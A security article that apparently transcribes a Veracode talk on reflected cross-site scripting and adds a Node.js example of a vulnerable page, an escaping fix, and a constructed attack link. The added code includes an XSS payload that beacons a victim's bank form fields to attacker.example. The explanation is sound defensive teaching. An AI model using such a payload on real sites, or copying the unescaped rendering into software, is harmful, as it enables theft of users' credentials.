Article by Ian Broderick
This is the first part of a series of talks given by Veracode co-founder and VP of Research Chris Eng.
In this video, Chris explains what Cross-Site Scripting is and how it enables an attacker to inject client-side script into web pages viewed by other users.
We have also transcribed the talk for your convenience:
The user might submit their first name and last name in the form; the web application then responds with a page containing an echo of what the user submitted in the form. This is a common thing for applications to do. The XSS vulnerability occurs if the web application takes potentially dangerous data and echoes that back to the user.
The attacker can even make it so that the information gets sent to them first and then to the actual application, so that the user doesn’t know that their data is going somewhere else.
This link can be sent to somebody in a number of different ways. The attacker could send them an email claiming to be from a bank, saying that a fraudulent transaction was noticed and that they need to click on the link to log in to the bank. If it looks official, people will click the link without thinking.
Another way to do this is using a shortened URL. The attacker will send a message such as "Check out this cool new story that I read" with the link. The user will then click on the link to go to what they think is a newspaper site, but in reality this will redirect them to a URL that contains an attack. With shortened URLs in Twitter and Facebook you can easily fool somebody into clicking on a link. This is one form of an XSS attack, called reflected XSS.
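The following is an added example, not code from the talk or from Veracode, that shows the pattern Chris describes: a page that echoes the submitted first and last name, the link an attacker would mail or shorten to reflect a script through that echo, and the fix (escaping the values before they go into the HTML). The hostnames bank.example and attacker.example, the /greet route, the parameter names, and the payload are all assumptions chosen for illustration; the payload follows the "send the form data to the attacker first, then on to the real application" idea from the talk.

```javascript
// Added example (not from the original talk). Runs under Node.js; the
// attacker's script is only built as a string here, never executed.

// Vulnerable: the submitted names are concatenated straight into the HTML.
// The echo sits after the form so a reflected script can find it by id.
function renderGreetingVulnerable(first, last) {
  return (
    "<html><body>" +
    '<form id="f" method="post" action="/submit">' +
    '<input name="account"><input name="pin" type="password">' +
    '<button>Send</button></form>' +
    `<p>Hello, ${first} ${last}!</p>` +
    "</body></html>"
  );
}

// Minimal HTML entity escaping for text placed inside an element body.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Fixed: same page, but user-controlled values are escaped before insertion.
function renderGreetingSafe(first, last) {
  return renderGreetingVulnerable(escapeHtml(first), escapeHtml(last));
}

// Simulate the server handling GET /greet?first=...&last=... for a given URL.
// The base URL is a placeholder used only to parse relative requests.
function handleRequest(rawUrl, render) {
  const u = new URL(rawUrl, "http://bank.example");
  return render(u.searchParams.get("first") || "", u.searchParams.get("last") || "");
}

// Constructed attacker payload: when the victim submits the real form, a copy
// of the fields is beaconed to the attacker first; the browser then carries on
// and posts the form to the bank as normal, so the victim notices nothing.
const PAYLOAD =
  "<script>document.getElementById('f').addEventListener('submit',function(e){" +
  "navigator.sendBeacon('http://attacker.example/c',new FormData(e.target));});</script>";

// The link the attacker would email as "the bank" or hide behind a URL shortener.
const ATTACK_URL =
  "http://bank.example/greet?first=" + encodeURIComponent(PAYLOAD) + "&last=Smith";

// Check used to show whether a rendered page contains live script.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log("vulnerable page:\n" + handleRequest(ATTACK_URL, renderGreetingVulnerable));
console.log("\nfixed page:\n" + handleRequest(ATTACK_URL, renderGreetingSafe));
```

Running it prints the two responses: in the first, the attacker's `<script>` is reflected into the page intact and will run in the victim's browser under the bank's origin; in the second it appears only as harmless text (`&lt;script&gt;...`). Escaping on output is the fix the talk points at; it has to be applied for the context the data lands in (element body here; attribute, URL and JavaScript contexts each need their own encoding).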
We hope you enjoyed this video. Keep an eye out for part two of the series.
Cross-posted from Veracode